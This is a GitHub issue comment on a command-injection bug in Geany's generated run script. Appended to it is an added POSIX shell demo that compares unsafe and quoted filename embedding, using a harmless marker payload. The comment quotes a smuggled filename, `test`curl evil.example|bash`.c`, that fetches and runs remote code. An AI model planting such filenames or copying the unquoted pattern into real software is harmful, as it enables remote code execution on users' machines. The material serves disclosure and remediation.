CVE-Hunter-Leo left a comment (geany/geany#4611)

@WrapEarnPass Thanks for testing this and for the detailed feedback.

You're right that a literal `/` cannot appear in a filename on Linux. The `/` in my original example was inside the backtick command (i.e. part of the payload), not a character in the filename itself. Filenames containing backticks (`` ` ``), `$()`, `;`, `|`, etc. are perfectly valid on Linux/macOS. Your modified test case (`` test`curl evil.example|bash`.c ``) confirms the core issue: command substitution still occurs in the generated `geany_run_script_*.sh`, which is exactly the problem being reported.

I also appreciate you capturing the actual shell script output. It clearly shows the backtick expression being executed by the shell.

Regarding CVSS:

- I had initially scored it as 7.8 (Critical) because arbitrary command execution is possible with a very common user action (pressing F5/Execute on a file received from someone else).
- Your scoring of ~6.1 is reasonable if we consider the attack requires the victim to open and explicitly run the file.

I'm happy to go with whatever the maintainers decide.

On the geany-plugins point, thank you for raising it. If the same unsafe substitution pattern exists in plugins (geanyctags, lsp, etc.), it would be good to track those separately so they don't get overlooked.

I'm happy to provide more details, or adjust the issue description if needed. Just let me know how you'd like to proceed.

--
Reply to this email directly or view it on GitHub: https://github.com/geany/geany/issues/4611#issuecomment-4846041794

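The following is an added example, not Geany's code and not a copy of the real `geany_run_script_*.sh` template: a throwaway "run script" is generated two ways from a filename that carries a backtick expression, once with the name pasted in verbatim (the pattern the comment above describes) and once with the name single-quoted, and each script is then executed under a fresh `/bin/sh` to show which one runs the embedded command. The payload is a constructed `touch` of a marker file standing in for `curl evil.example|bash`, so the whole thing runs offline; the generator functions, the marker path and the `shell_quote` helper are this example's own names, not Geany's.

```shell
#!/bin/sh
# Added example (not Geany code): command substitution from an
# attacker-chosen filename in a generated run script, and the fix.
set -u

# Constructed payload. Instead of "curl evil.example|bash" the backtick
# expression only creates a marker file we can check for afterwards.
MARKER="${TMPDIR:-/tmp}/geany_subst_marker.$$"
EVIL_NAME="test\`touch $MARKER\`.c"

# Vulnerable generator (stand-in for the real template): the filename is
# written into the script text as-is, so its backticks become shell syntax.
gen_unsafe() {
    printf '#!/bin/sh\necho "Building: %s"\n' "$1"
}

# Quote an arbitrary string so /bin/sh reads it as one literal word:
# wrap it in single quotes and rewrite each embedded ' as '\''.
# Inside single quotes, backticks, $(), ;, | and spaces are all inert.
shell_quote() {
    printf "'%s'" "$(printf '%s' "$1" | sed "s/'/'\\\\''/g")"
}

# Hardened generator: the filename lands in the script as a quoted literal.
gen_safe() {
    printf '#!/bin/sh\necho "Building: "%s\n' "$(shell_quote "$1")"
}

# Evaluate the quoted form the way the generated script would; this must
# give back the original bytes without running anything.
roundtrip() {
    eval "printf '%s' $(shell_quote "$1")"
}

# Write the script produced by generator $1, run it under a fresh sh, and
# report "executed" if the injected command ran (marker appeared), else "clean".
probe() {
    rm -f "$MARKER"
    script="${TMPDIR:-/tmp}/geany_run_script_demo.$$.sh"
    "$1" "$EVIL_NAME" > "$script"
    sh "$script" >/dev/null 2>&1
    rm -f "$script"
    if [ -e "$MARKER" ]; then
        rm -f "$MARKER"
        echo executed
    else
        echo clean
    fi
}

# Demo: the verbatim script runs the payload, the quoted one does not.
printf 'verbatim filename: %s\n' "$(probe gen_unsafe)"
printf 'quoted filename:   %s\n' "$(probe gen_safe)"
```

`shell_quote` is plain POSIX sh (no `printf %q`, which is a bash extension), so the same helper works wherever the script is later run by `/bin/sh`. The alternative design, also an assumption rather than anything the thread proposes, is to not embed the filename in the script text at all and instead pass it as a positional parameter (`"$1"`) when the script is invoked; either way the point is that user-controlled bytes must never be parsed as shell syntax.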